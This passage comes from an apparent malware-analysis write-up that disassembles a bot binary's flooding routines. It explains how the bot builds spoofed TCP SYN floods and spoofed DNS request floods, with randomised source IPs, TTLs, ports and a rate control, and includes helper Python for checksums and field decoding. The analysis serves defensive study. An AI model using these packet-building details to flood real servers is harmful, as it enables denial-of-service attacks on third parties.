Still the same process, with a MOD 0x2625a00, leal 0x1(%edx) this time. This is placed into 0xffffffe0(%ebp), the sequence number. The MOD and leal 0x1 will result in the sequence number being between 1 and 0x2625a00.

And finally, once more we obtain a random number, MOD it by 0x74, and add 0x7d. The result is placed into 0xffffffd0(%ebp) which is the IP packet's TTL field, making it random between 125 and 240. Continuing:

0x8049fd9: cmpl $0x0,0x20(%ebp)
0x8049fdd: jne 0x804a01c

0x20(%ebp) is LongG.
If this is 0, a long process is undertaken which leads to a result of a dotted quad string located at 0xffffff68(%ebp), made up of random octets (excluding 255 for each). Regardless of LongG, we continue:

0x804a01c: leal 0xffffff68(%ebp),%eax
0x804a022: pushl %eax
0x804a023: call 0x804ce8c
0x804a028: movl %eax,0xffffffd4(%ebp)
0x804a02b: movl %eax,0xffffffa8(%ebp)

This passes the dotted quad (random, or built from LongH-K) through inet_addr and places the result in two places: the IP header source address, and the believed pseudo header source address. More setup:

0x804a02e: movw $0x0,0xffffffec(%ebp)
0x804a034: movw $0x0,0xffffffd2(%ebp)

0xffffffec(%ebp), the TCP checksum, is set to 0. 0xffffffd2(%ebp), the IP checksum, is set to 0.

0x804a03a: pushl $0x14
0x804a03c: leal 0xffffffb4(%ebp),%eax
0x804a03f: pushl %eax
0x804a040: leal 0xffffffdc(%ebp),%eax
0x804a043: pushl %eax
0x804a044: call 0x8056480

Misc_Data_Copy is called upon to copy 20 bytes from 0xffffffdc(%ebp) to 0xffffffb4(%ebp). We know that 0xffffffdc(%ebp) is the start of the TCP header. We do not know at this time what the size of the TCP header will be, but we assume 20 bytes. This 20 byte TCP header is copied to what would be the tcp header duplicate in the pseudo header (12 byte offset from 0xffffffa8(%ebp)).

What is believed to be checksum code is started. What we look for is either 0xffffffa8(%ebp) or 0xffffffc8(%ebp) being used, since these are the beginnings of the pseudo and ip headers. In looking over the code, %edx is used as a size field. It is initially set like this:

0x804a04c: movl $0x20,%edx

Which seems to make the loop initially run over 0x20 bytes (while incrementing the 'checksum' by the value of each byte). The fact that this would appear to be calculating the checksum of 32 bytes (12 bytes of pseudo header plus 20 bytes of TCP header) gives it away as being the pseudo header checksum.
Indeed, eventually:

0x804a0b5: movw %ax,0xffffffec(%ebp)

This location directly corresponds to 16 bytes into the TCP header, confirming it is indeed the tcp checksum (calculated from the pseudo header). Following this checksum, another seems to be done:

0x804a0b9: movl $0x14,%edx

Indicating a 20 byte loop, and finally:

0x804a121: movw %ax,0xffffffd2(%ebp)

Placing the resulting checksum into 0xffffffd2(%ebp), the IP checksum. We then set up for a call:

0x804a125: pushl $0x10
0x804a127: leal 0xfffffff0(%ebp),%eax
0x804a12a: pushl %eax
0x804a12b: pushl $0x0
0x804a12d: pushl $0x28
0x804a12f: leal 0xffffffc8(%ebp),%eax
0x804a132: pushl %eax
0x804a133: movl 0xffffff40(%ebp),%ebx
0x804a139: pushl %ebx
0x804a13a: call 0x8056c3c

This call is sendto(). The first parameter is 0xffffff40(%ebp) as expected (the socket returned by socket() earlier). 0xffffffc8(%ebp) is the buffer address to be sent, which does match up to the 'packet buffer' that has been constructed all this time. The amount of data to be sent is 0x28 (40 bytes), and 0xfffffff0(%ebp) does match up to an AF_INET sockaddr structure that was defined very early in the function. The sendto() is followed by:

0x804a142: cmpl $0x0,0x34(%ebp)
0x804a146: jne 0x804a154

This checks LongL. If it is 0:

0x804a148: pushl $0x12c
0x804a14d: call 0x80555b0
0x804a152: jmp 0x804a165

It will call a usleep(0x12c). If LongL is not 0:

0x804a154: cmpl %edi,0x34(%ebp)
0x804a157: jne 0x804a170
0x804a159: pushl $0x12c
0x804a15e: call 0x80555b0
0x804a163: xorl %edi,%edi

It will compare %edi, which appears to take on the role of a counter, to LongL. If the two are equal, a usleep(0x12c) is called, and the counter is reset.

0x804a165: decl %esi
0x804a169: jmp 0x8049ef0

%esi (used as a hostname re-resolve counter) is also decremented before it jumps back up into the loop.

0x804a170: incl %edi
0x804a171: jmp 0x8049ef0

If %edi is not equal to LongL, it will increment it and jump back into the loop.
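The two checksum loops in this function (0x20 bytes, then 0x14 bytes) were not disassembled line by line above, so the following is not taken from the binary. It is a sketch of the standard Internet checksum (RFC 1071) applied to a 12 byte pseudo header plus a 20 byte TCP header, which is what the 32 byte length suggests. All addresses, ports and helper names are made-up sample values.

```python
import struct

def internet_checksum(data):
    """Standard RFC 1071 checksum: one's complement of the 16-bit word sum."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length input
    total = 0
    for (word,) in struct.iter_unpack("!H", data):
        total += word
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def pseudo_header(src, dst, proto, length):
    """src(4) + dst(4) + zero(1) + protocol(1) + length(2) = 12 bytes."""
    return src + dst + struct.pack("!BBH", 0, proto, length)

# Sample values only (documentation address ranges, arbitrary ports).
src = bytes([192, 0, 2, 1])
dst = bytes([198, 51, 100, 7])
tcp = struct.pack("!HHIIBBHHH", 1234, 80, 1, 0, 0x50, 0x02, 512, 0, 0)

block = pseudo_header(src, dst, 6, len(tcp)) + tcp
csum = internet_checksum(block)              # checksum field was 0 while summing

# Drop the result into bytes 16-17 of the TCP header, as the movw to
# 0xffffffec(%ebp) appears to do, and re-check the whole block.
tcp_done = tcp[:16] + struct.pack("!H", csum) + tcp[18:]
verify = internet_checksum(pseudo_header(src, dst, 6, len(tcp_done)) + tcp_done)
print(len(block), hex(csum), verify)
```

A receiver recomputing the sum over a correctly checksummed block gets 0, which is a handy way to test captured packets during the network analysis stage.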
Disassembly Review:

Another complex function, with a lot of duplicate code from the other network functions. Once again, the sprintf(X, "X.X.X.X",A,B,C,D) is used in conjunction with inet_addr to obtain long based IP addresses. A buffer seems to be used, dedicated to setting up a TCP packet. The fields of this buffer are filled in. If LongG is 0, the source IP is random (without any 255 octets), else the octets are set to the values contained in LongH, LongI, LongJ, and LongK. The tcp destination port seems to be set by LongE and LongF. LongL looks to be able to control the packets per second by using it as a comparison to a counter (%edi) to determine when a usleep() is called. If LongM is 0, the destination IP octets for the packets are set by LongA, LongB, LongC, and LongD. If LongM is not 0, the hostname in BufferA is looked up using gethostbyname(), and the first IP for it is used as the destination IP. This hostname is periodically re-resolved; the exact time between resolutions is unknown and will have to be measured during run-time testing.

The flags of the TCP packet go through some strange actions to get them to a stable point. It would appear that the compiler (or author) did some strange actions upon them (some of which are voided). In analysing sections of the code, the bigger picture is lost. The outcome of the tcp flag section appears to be that 0xffffffe9(%ebp) is set straight out to be 0x2 (overruling the previous unreliable andb actions). 0xffffffe8(%ebp) ends up being set to %al which is, strangely enough, set to *0xffffffe8(%ebp) ANDB 0xf, ORB 0x50, ANDB 0x50. The result of these operations will obviously leave 0xffffffe8(%ebp) at 0x50; it is just noteworthy to see the incredibly strange involvement of uninitialised bytes. The outcome of these operations will leave the TCP doff field set to 5 (indicating a 20 byte tcp header), and all other flags 0 except SYN.

Function Overview:

Yet another 'packetting' function. This time an obvious SYN flooder.
The attack is made rather potent by the randomising of many of the fields such as the TTL. The source address seems spoofable to completely random IP's, or a single IP. The destination port is settable to a unique port, while the source ports are always random. The only comfort a victim of this attack can take is that any ingress filtering done on obviously spoofed IP's should block a small amount of the attack. The amount of traffic generated by this function is variable by the blackhat. The amount is dependent upon LongL; however, exact packet-per-second analysis versus this value will have to be done at runtime.

Features of this attack:
* TCP SYN flood.
* Single victim.
* Victim may be hostname-based.
* Hostname can be re-looked up every X packets!
* Completely random, or a single IP spoofed as source.
* Attack speed is adjustable.

The network traffic generated by this function will be examined in more detail in Network_Analysis_E.

g) Network_Function_E [0x8049564] - (Network)

Known Usage:

function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp), 0xffffbb44(%ebp))

Guesses at purpose:

Once again, believed to be a 'packetting' function due to similar parameters and positioning.

Naming Conventions:

Parameters will be given the following names:

function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH, LongI, LongJ, LongK, LongL, BufferA)

Disassembly:

Once again, many of the parameters are copied into localised variables.

0x80495b8: leal 0xffffffdc(%ebp),%edi
0x80495bb: movl $0x8067698,%esi
0x80495c0: cld
0x80495c1: movl $0x9,%ecx
0x80495c6: repz movsl %ds:(%esi),%es:(%edi)

This sees to the copying of 9 longs from 0x8067698 to 0xffffffdc(%ebp).
(gdb) x/36b 0x8067698 0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00 0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00 0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00 0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00 0x80676b8: 0x14 0x00 0x00 0x00 These longs look remarkably similar to those from Network_Function_B, and it turns out the same source is used in both functions. Another data copy follows: 0x80495c8: leal 0xfffffde8(%ebp),%edi 0x80495ce: movl $0x80676bc,%esi 0x80495d3: cld 0x80495d4: movl $0x7d,%ecx 0x80495d9: repz movsl %ds:(%esi),%es:(%edi) This sees to the copy of 500 bytes from 0x80676bc to 0xfffffde8(%ebp). Once again, 0x80676bc was seen in Network_Function_B. Some variables are set up: 0x80495db: leal 0xfffff9d8(%ebp),%edi 0x80495e1: leal 0xfffff9ec(%ebp),%ebx 0x80495e7: movl %ebx,0xfffff988(%ebp) 0x80495ed: leal 0xfffff9f4(%ebp),%ebx 0x80495f3: movl %ebx,0xfffff984(%ebp) 0x80495f9: movw $0x2,0xfffffdd8(%ebp) 0x8049602: movw $0x0,0xfffffdda(%ebp) And now comes the start of the 'real' code: 0x804960b: cmpl $0x0,0x34(%ebp) 0x804960f: jne 0x8049645 0x34(%ebp) is LongL. If it is 0: 0x8049611: movzbl 0xfffff9a0(%ebp),%eax 0x8049618: pushl %eax 0x8049619: movzbl 0xfffff9a4(%ebp),%eax 0x8049620: pushl %eax 0x8049621: movzbl 0xfffff9a8(%ebp),%eax 0x8049628: pushl %eax 0x8049629: movzbl 0xfffff9ac(%ebp),%eax 0x8049630: pushl %eax 0x8049631: pushl $0x806768a 0x8049636: leal 0xfffff9b8(%ebp),%eax 0x804963c: pushl %eax 0x804963d: call 0x804f808 This is an sprintf() call, once again to form a dotted quad from LongA, LongB, LongC, and LongD at 0xfffff9b8(%ebp). Another condition is done after the completion of the last. LongI is checked: 0x8049645: cmpl $0x0,0x28(%ebp) 0x8049649: je 0x804964e 0x804964b: decl 0x28(%ebp) If it is non-zero, it is decremented. 
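The 36 bytes dumped from 0x8067698 above are easier to read once decoded as nine little-endian longs, and the size of the second copy follows from the repz movsl count. A minimal sketch (the variable names are made up):

```python
import struct

# The 36 bytes shown in the gdb dump of 0x8067698.
dump = bytes([
    0x15, 0, 0, 0,  0x15, 0, 0, 0,  0x14, 0, 0, 0,
    0x15, 0, 0, 0,  0x15, 0, 0, 0,  0x19, 0, 0, 0,
    0x14, 0, 0, 0,  0x14, 0, 0, 0,  0x14, 0, 0, 0,
])

# x86 stores longs least significant byte first, hence "<".
lengths = list(struct.unpack("<9I", dump))
print(lengths)

# repz movsl copies %ecx longs of 4 bytes each.
second_copy_bytes = 0x7D * 4
print(second_copy_bytes)
```

This gives the nine values, all between 20 and 25, and confirms the 500 byte figure for the copy from 0x80676bc.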
0x804964e: pushl $0xff
0x8049653: pushl $0x3
0x8049655: pushl $0x2
0x8049657: call 0x8056cf4
0x804965c: movl %eax,0xfffff98c(%ebp)

A socket() call with the same parameters as in previous network functions. The socket descriptor is stored into 0xfffff98c(%ebp).

0x8049665: testl %eax,%eax
0x8049667: jle 0x80499d8

It is then tested to see if the socket() call was successful. If so, it continues:

0x804966d: movl $0x0,0xfffff980(%ebp)
0x8049677: movl $0x0,0xfffff97c(%ebp)
0x8049681: pushl $0x400
0x8049686: pushl $0x0
0x8049688: pushl %edi
0x8049689: call 0x8057764

This function is believed to be a memset() and that assumption still holds true. %edi was earlier set to 0xfffff9d8(%ebp). This call should result in the 0x400 (1024) bytes starting at 0xfffff9d8(%ebp) being set to 0. Continuing:

0x8049694: xorl %esi,%esi
0x8049696: cmpl $0x0,0x34(%ebp)
0x804969a: je 0x80496fc
0x804969c: cmpl $0x0,0xfffff97c(%ebp)
0x80496a3: jg 0x80496fc

%esi is set to 0 (perhaps indicating a loop). Two conditions are then checked (much like in previous functions). Firstly, LongL is checked to be non-zero, and then 0xfffff97c(%ebp) to be <= 0. 0xfffff97c(%ebp) was recently set to 0 (this check probably occurs within a loop so only the first iteration would be 0). If both of these conditions are true:

0x80496a5: movl 0x38(%ebp),%ebx
0x80496a8: pushl %ebx
0x80496a9: call 0x804bf80

BufferA is pushed and gethostbyname() is called. This exact same code has been seen several times before. If gethostbyname() fails, a sleep(600) is done, and %esi is set to 1. If it succeeds, the first IP address of the hostname in BufferA is copied to 0xfffff9b4(%ebp). This address is then copied:

0x80496e6: movl %eax,0x10(%edi)
0x80496e9: movl %eax,0xfffffddc(%ebp)

Looking back, %edi should be 0xfffff9d8(%ebp). So the IP address is copied into 0xfffff9e8(%ebp). The address is also copied into 0xfffffddc(%ebp).
Another interesting thing to happen:

0x80496ef: movl $0x9c40,0xfffff97c(%ebp)

This same number has been seen in other functions as a 'counter' that is set to 0x9c40 after each successful gethostbyname(). It is decremented at timed intervals in other functions, and when it reached 0 the gethostbyname() would be redone. Looking at 0x804969c, this function will most probably be identical in operation. We then exit out of the above conditionals and continue:

0x80496fc: testl %esi,%esi
0x80496fe: jne 0x8049694

%esi was earlier xorl'd to 0, and should only be 1 if gethostbyname() was called and failed (as seen in other functions). If %esi is 0:

%esi is interestingly re-xorl'd to 0. This might indicate it takes on a new purpose for the remainder of this conditional. A new conditional:

0x8049708: cmpl $0x0,0x34(%ebp)
0x804970c: jne 0x8049723

Once again, checking LongL. If it is 0:

0x804970e: leal 0xfffff9b8(%ebp),%eax
0x8049714: pushl %eax
0x8049715: call 0x804ce8c
0x804971a: movl %eax,0xfffffddc(%ebp)

0x804ce8c is an inet_addr() call, and 0xfffff9b8(%ebp) was earlier dot quadded by the sprintf() call at 0x804963d. The resultant long is placed into 0xfffffddc(%ebp). Regardless of LongL:

0x8049723: movl 0xfffff978(%ebp),%edx
0x8049729: addl $0xfffffde8,%edx
0x804972f: movl 0xffffffdc(%ebp,%esi,4),%eax
0x8049733: pushl %eax
0x8049734: pushl %edx
0x8049735: movl 0xfffff984(%ebp),%ebx
0x804973b: pushl %ebx
0x804973c: call 0x805652c

The call to 0x805652c is unknown, but was briefly looked at in Data_Function_B. It was ascertained there that it formed a data copy loop. In looking back at the analysis done at Data_Function_B, this call *should* result in *0xffffffdc(%ebp,%esi,4) bytes being copied from *0xfffff978(%ebp)+$0xfffffde8 to *0xfffff984(%ebp). Looking up all these values reveals that 0xffffffdc is the list of 9 longs, each with values between 20 and 25. 0xfffff978(%ebp) was earlier quite oddly set to %ebp.
This means that $0xfffffde8 is quite effectively a stack address! It should be noted that 0xfffff978(%ebp) will quite likely change for later iterations. 0xfffffde8(%ebp) is the beginning of the 500 bytes of data copied at the very beginning of this network function. The destination for the data copy is unknown at this point in time. This function is followed by a random() call with:

0x8049749: movl $0xff,%ebx
0x804974e: cltd
0x804974f: idivl %ebx,%eax
0x8049751: movl 0xfffff984(%ebp),%ebx
0x8049757: movb %dl,(%ebx)

This should put a random byte (with the exception of 0xFF) into the location pointed to by 0xfffff984(%ebp). Interestingly enough, this is the first byte of the data that we just finished copying! The same process is done again, but this time:

0x804976c: movb %dl,0x1(%ebx)

It fills in the second byte of that same data buffer with another random value. A parameter check:

0x804976f: cmpl $0x0,0x2c(%ebp)
0x8049773: jne 0x804978c
0x8049775: cmpl $0x0,0x30(%ebp)
0x8049779: jne 0x804978c

This checks if LongJ and LongK are both 0. If so, we do the random() call with a MOD 0x7530. The result is placed into %eax and execution jumps to 0x8049796. If LongJ or LongK is not 0:

0x804978c: movl 0x2c(%ebp),%eax
0x804978f: shll $0x8,%eax
0x8049792: addw 0x30(%ebp),%ax

The two parameters, LongJ and LongK, make up the high and low order bytes of %ax. So if LongJ and LongK are both 0, %ax has a random value (below 0x7530), and if either is non-zero, %ax is filled with their values. Once this is done:

0x8049796: xchgb %al,%ah
0x8049798: movl 0xfffff988(%ebp),%ebx
0x804979e: movw %ax,(%ebx)

%ax is effectively htons()'d, and the value placed into *0xfffff988(%ebp). 0xfffff988(%ebp) was earlier set to 0xfffff9ec(%ebp). Other network functions have used this technique to operate with ports.
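The shll/addw/xchgb sequence above can be replayed to see what ends up in memory. This is a small sketch with made-up helper names; the sample parameter values are arbitrary.

```python
def port_from_params(hi, lo):
    """Replay: movl hi,%eax ; shll $0x8,%eax ; addw lo,%ax."""
    eax = (hi << 8) & 0xFFFFFFFF
    # addw only touches the low 16 bits; a 'lo' above 255 would spill
    # into the high byte rather than being rejected.
    return (eax + lo) & 0xFFFF

def xchg_al_ah(ax):
    """Replay: xchgb %al,%ah (swap the two bytes of %ax)."""
    return ((ax & 0xFF) << 8) | (ax >> 8)

def stored_bytes(ax):
    """movw on little-endian x86 writes the low byte of %ax first."""
    return bytes([ax & 0xFF, ax >> 8])

port = port_from_params(0x1F, 0x90)          # sample values only
on_wire = stored_bytes(xchg_al_ah(port))
print(port, on_wire.hex())
```

With the sample values the port is 8080 and the bytes written are 1f 90, i.e. the port in network byte order, which is exactly what htons() would produce on this architecture.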
It is assumed 0xfffff9ec(%ebp) is a port, but still no further assumptions can be made since we still do not know if we are making a UDP or TCP packet; the port could be destination or source, or even a sockaddr port (has been done before). Continuing:

0x80497a1: movl 0xfffff988(%ebp),%ebx
0x80497a7: movw $0x3500,0x2(%ebx)

This is interesting, primarily because it is 2 bytes after the 'port' number we just placed at *0xfffff988(%ebp). 0x35 is easily recognisable as port 53. We were earlier dealing with the same data that was used in Network_Function_B for DNS based purposes, so it is quite likely that this is the destination port, and the previous was a source port, all being constructed once again in a 'packet buffer'. Still with no hard evidence, we continue:

0x80497ad: movw 0xffffffdc(%ebp,%esi,4),%ax
0x80497b2: addw $0x8,%ax
0x80497b6: xchgb %al,%ah
0x80497b8: movw %ax,0x4(%ebx)
0x80497bc: movw $0x0,0x6(%ebx)

Firstly, %ax is filled with one of those 9 20-25 values which start at 0xffffffdc. %esi is obviously used as an index which is initially 0. 8 is added to the value, then htons()'d, and finally stored at 0x4(%ebx). A 0 word is placed after that. This almost confirms that a udp header was just created. Evidence being the addition of 8 to the number (which was used as a datasize in Network_Function_B) and the placement into what would be the length field of the udp header. The 0 would correspond to the checksum. A series of checks (in an OR line-up):

0x80497c2: cmpb $0x0,0xfffff99c(%ebp)
0x80497c9: jne 0x804983c
0x80497cb: cmpb $0x0,0xfffff998(%ebp)
0x80497d2: jne 0x804983c
0x80497d4: cmpb $0x0,0xfffff994(%ebp)
0x80497db: jne 0x804983c
0x80497dd: cmpb $0x0,0xfffff990(%ebp)
0x80497e4: jne 0x804983c

The locations checked correspond to the local copies of the parameters (which were duplicated at the very beginning of the function). The exact parameters are believed to be: LongE, LongF, LongG, LongH.
If all of these are zero, a long series of random() calls are done in conjunction with setae's (setnc's) / andb masks. The outcome of this process is the creation of 4 bytes 0-254. These bytes are placed into 0xfffff9e4(%ebp) to 0xfffff9e7(%ebp). If any of the above checks are non-zero: 0x804983c: movb 0xfffff99c(%ebp),%bl 0x8049842: movb %bl,0xfffff9e4(%ebp) 0x8049848: movb 0xfffff998(%ebp),%bl 0x804984e: movb %bl,0xfffff9e5(%ebp) 0x8049854: movb 0xfffff994(%ebp),%bl 0x804985a: movb %bl,0xfffff9e6(%ebp) 0x8049860: movb 0xfffff990(%ebp),%bl 0x8049866: movb %bl,0xfffff9e7(%ebp) The values are quite simply placed directly into those memory locations instead of random values. Following on: 0x804986c: cmpl $0x0,0x34(%ebp) 0x8049870: jne 0x80498a2 LongL is checked, if it is 0: 0x8049872: movb 0xfffff9ac(%ebp),%bl 0x8049878: movb %bl,0xfffff9e8(%ebp) 0x804987e: movb 0xfffff9a8(%ebp),%bl 0x8049884: movb %bl,0xfffff9e9(%ebp) 0x804988a: movb 0xfffff9a4(%ebp),%bl 0x8049890: movb %bl,0xfffff9ea(%ebp) 0x8049896: movb 0xfffff9a0(%ebp),%bl 0x804989c: movb %bl,0xfffff9eb(%ebp) A very similar data copy takes place, 4 bytes after the previous data positions (Its fairly likely these will be IP addresses, but until more packet details are uncovered, its useless analysing them). Now comes the packet details we've been waiting for: 0x80498a2: movb $0x45,(%edi) The 0x45 are assumed to correspond to an ihl and ip version of an IP header. Once again, we will assume a packet buffer is in the making. %edi would be the starting point, and was earlier set to 0xfffff9d8(%ebp). This means the previous data copies to addresses starting at 0xfffff9e4(%ebp) would correspond to the source address, then the destination address. While the IP header protocol field has not yet been set, a UDP header seems to be in place, along with a copy of data into an appropriate udp-data position. We should expect to see packet buffer configured as UDP. A random() call followed by MOD 0x82 code is then done. 
The result has 0x78 added and:

0x80498b5: movb %dl,0x8(%edi)

Is placed into the TTL position. This means any TTL will be between 120 and 249 (0x82 is 130, so the remainder is 0 to 129). Similar code again, this time the random number is MOD 255'd, then:

0x80498c5: movw %dx,0x4(%edi)

Directly placed into the IP ID field (note the lack of htons()).

0x80498c9: movb $0x11,0x9(%edi)
0x80498cd: movw $0x0,0x6(%edi)

Finally, we see the IP protocol field be set to 17 (UDP) as expected. This is followed by the IP offset being set to 0. Packet length calculations follow:

0x80498d3: movw 0xffffffdc(%ebp,%esi,4),%ax
0x80498d8: addw $0x1c,%ax
0x80498dc: xchgb %al,%ah
0x80498de: movw %ax,0x2(%edi)

The first line grabs the indexed data length (indexed by %esi). 0x1c is added; this is the size of a 20 byte IP header plus an 8 byte UDP header. The value is htons()'d and stored into the IP header total length field.

0x80498e2: movw $0x0,0xa(%edi)

0xa(%edi) corresponds to the checksum, so the above line sets it to 0. The checksum process is then believed to start:

0x80498e8: movl $0x14,%edx

Once again, forming a loop of 0x14 iterations (to process 20 bytes). The starting position is set to 0xfffff9d8(%ebp) which is the start of the packet buffer. Eventually, we see:

0x8049951: movw %ax,0xa(%edi)

Which sets the IP checksum. This is followed by a call setup:

0x8049955: pushl $0x10
0x8049957: leal 0xfffffdd8(%ebp),%eax
0x804995d: pushl %eax
0x804995e: pushl $0x0
0x8049960: movl 0xffffffdc(%ebp,%esi,4),%eax
0x8049964: addl $0x1c,%eax
0x8049967: pushl %eax
0x8049968: leal 0xfffff9d8(%ebp),%eax
0x804996e: pushl %eax
0x804996f: movl 0xfffff98c(%ebp),%ebx
0x8049975: pushl %ebx
0x8049976: call 0x8056c3c

This is a simple sendto() call. It uses 0xfffff9d8(%ebp) as the send buffer (as expected), and 0xfffff98c(%ebp) as the socket. 0x1c plus the data amount is the total number of bytes to be sent (as expected).
0xfffffdd8(%ebp) marks a sockaddr structure which was set up under an AF_INET family, with a port of 0, and the address of the destination host. Following this call, we see identical code to that which has been seen before. The code responsible for timing sleep()'s and resolving of BufferA (if chosen):

0x804997e: cmpl $0x0,0x28(%ebp)
0x8049982: jne 0x8049990
0x8049984: pushl $0x12c
0x8049989: call 0x80555b0
0x804998e: jmp 0x80499af
0x8049990: movl 0x28(%ebp),%ebx
0x8049993: cmpl %ebx,0xfffff980(%ebp)
0x8049999: jne 0x80499bc
0x804999b: pushl $0x12c
0x80499a0: call 0x80555b0
0x80499a5: movl $0x0,0xfffff980(%ebp)
0x80499af: decl 0xfffff97c(%ebp)
0x80499b8: jmp 0x80499c2

Basically, if LongI is 0, it will usleep(0x12c). If not, it will check LongI to see if it matches the value at 0xfffff980(%ebp). If it does, it will usleep(0x12c), reset 0xfffff980(%ebp) back to 0, and decrement 0xfffff97c(%ebp) (a variable which, upon reaching 0, indicates BufferA should be re-gethostbyname()'d). This host resolution variable is decremented if LongI is 0 as well. If LongI is non-zero AND it does not equal the value at 0xfffff980(%ebp), then this value is simply incremented.

0x80499bc: incl 0xfffff980(%ebp)
0x80499c2: addl $0x32,0xfffff978(%ebp)

Several variables are incremented. The first is not recognised, and has not been seen before [in fact does not seem to be used anywhere in the function!??!]. The second adds 50 to 0xfffff978(%ebp). This is the pointer to the data component of the packet. This effectively changes the UDP packet's contents. %esi's counter use now becomes clear:

0x80499c9: incl %esi
0x80499ca: cmpl $0x8,%esi
0x80499cd: jle 0x8049708

%esi is used to keep track of the 9 data type states. It will keep the loop going (by jumping back to 0x8049708) until %esi hits 9. At which time:

0x80499d3: jmp 0x8049694

Execution passes back further to cater for the gethostbyname() section.
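The sleep and counter logic just described can be modelled without any networking to see how often the usleep(0x12c) fires. This is a sketch of the control flow only, based on the branch targets listed above; the function name simulate and the packet counts are made up for illustration.

```python
def simulate(long_i, packets):
    """Model the post-sendto() branch logic for a number of loop passes.

    Returns (usleep calls, decrements of the re-resolve countdown).
    long_i is the value in 0x28(%ebp) as seen inside the loop.
    """
    counter = 0        # 0xfffff980(%ebp)
    sleeps = 0
    resolve_decs = 0   # decl 0xfffff97c(%ebp)
    for _ in range(packets):
        if long_i == 0:
            sleeps += 1            # usleep(0x12c) after every packet
            resolve_decs += 1
        elif counter == long_i:
            sleeps += 1            # usleep(0x12c), then reset the counter
            counter = 0
            resolve_decs += 1
        else:
            counter += 1           # incl 0xfffff980(%ebp), no sleep
    return sleeps, resolve_decs

print(simulate(0, 10))
print(simulate(3, 8))
```

With a loop value of 3 the sleep happens once every 4 packets. Since LongI was decremented once at the top of the function when non-zero, a caller-supplied value of N would give one 300 microsecond sleep per N packets, if this model is right. It also shows the re-resolve countdown only ticks on passes that sleep, so the number of packets between hostname lookups scales with LongI.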
It should be remembered that 500 bytes of data were copied in the beginning of the function, of which 9 x 50 bytes (450 bytes) are stepped through here. Also 9 longs were copied. This accounts for these 9 states, ensuring that it cycles through each.

Disassembly Review:

This function seems related to Network_Function_B, both in complexity, data, and purpose. The basic theme behind this function is to send packets to a single server, using the octets from LongA, LongB, LongC, and LongD. An optional source looks to be able to be specified. If LongE, LongF, LongG, and LongH are all 0, random source IP's will be generated for every outgoing packet. If any of them are non-zero, then they will be used as the source IP octets for every packet. LongI seems to be used for timing, determining how many packets are sent per second. LongJ and LongK look to be used solely for setting the source port of the attack. If they are both 0, a random source port below 0x7530 will be used. LongL and BufferA are used in an identical way to the other network functions. If LongL is 0, LongA-D are used as destination IP. If LongL is non-zero, BufferA is used as a hostname to be looked up to obtain the IP address. The most interesting part of this function has been seen before in Network_Function_B. That is, the cycling through of the 9 packet data contents (and lengths). The purpose of which will surely be uncovered in Network_Analysis_F.

Function Overview:

If Network_Function_B is indeed a DNS amplification attack as suspected, then this attack is expected to consume bandwidth on a DNS serving machine. It launches an attack against a single server, being able to spoof DNS requests from random addresses.

Features of this attack:
* DNS request flood.
* Single victim.
* Victim may be hostname-based.
* Hostname can be re-looked up every X seconds(minutes)!
* Completely random, or a single IP spoofed as source.
* Request source port can be manually set, or random.
* Attack speed is adjustable.
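The random field ranges quoted for this function and for the SYN function before it all come from the same "random() MOD m, then add a constant" pattern, so they can be double checked with simple arithmetic. The sketch assumes random() never returns a negative value, so the remainder is always 0 to m-1. The moduli and constants are the ones read from the disassembly; the labels and helper name are made up.

```python
def rand_range(modulus, add):
    """Inclusive (low, high) range of (random() % modulus) + add."""
    return add, add + modulus - 1

ranges = {
    "D: IP id":          rand_range(0xC11, 512),
    "D: TCP window":     rand_range(0x579, 0xC8),
    "D: TCP src port":   rand_range(0x9C40, 1),
    "D: TCP sequence":   rand_range(0x2625A00, 1),
    "D: IP ttl":         rand_range(0x74, 0x7D),
    "E: IP ttl":         rand_range(0x82, 0x78),
    "E: IP id":          rand_range(255, 0),
    "E: UDP src port":   rand_range(0x7530, 0),
}

for name, (low, high) in ranges.items():
    print("%-16s %d - %d" % (name, low, high))
```

These ranges could serve as a rough fingerprint when looking at captured traffic, for example a TTL that never falls below 120 together with a source port that never exceeds 29999.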
The network traffic generated by this function will be examined in more detail in Network_Analysis_F. h) Network_Function_F [0x8048f94] - (Network) Known Usage: function(Buffer1, Buffer2, Buffer3, number) Guesses at purpose: From the positioning of this function, it is believed it will be responsible for some communications channel from this binary, to the blackhat. Naming Conventions: Parameters will be given the following names: function(IP_Address, BufferA, BufferB, DataAmount) IP_Address is named as such since the buffer only looks to be modified in one position at the moment. That is, in the case sections of the "Core Functionality" where it is set to the destination IP of an incoming packet. Disassembly: Straight into it: 0x8048fa0: pushl $0xff 0x8048fa5: pushl $0x3 0x8048fa7: pushl $0x2 0x8048fa9: call 0x8056cf4 0x8056cf4 has already been identified as a socket() call. Matching it up to a C function call: socket(AF_INET, SOCK_RAW, IPPROTO_RAW) Next we check the result: 0x8048fae: movl %eax,0xffffffbc(%ebp) 0x8048fb4: cmpl $0xffffffff,%eax 0x8048fb7: je 0x8048fce The socket number is placed into 0xffffffbc(%ebp). It is then checked if it is -1 (fail) and if so, jumps to 0x8048fce, else: 0x8048fb9: movl 0x14(%ebp),%eax 0x8048fbc: addl $0x17,%eax 0x8048fbf: pushl %eax 0x8048fc0: call 0x805bd74 0x8048fc5: movl %eax,%esi This function call is unknown, and disassembling it doesn't help to uncover its purpose. It does not seem to do anything of much importance so it will just be left as an unknown for now. As a parameter, DataAmount+23 is passed and the return is recorded in %esi. This value is tested: 0x8048fca: testl %esi,%esi 0x8048fcc: jne 0x8048fd8 If the return was 0, the network function returns with 0. 
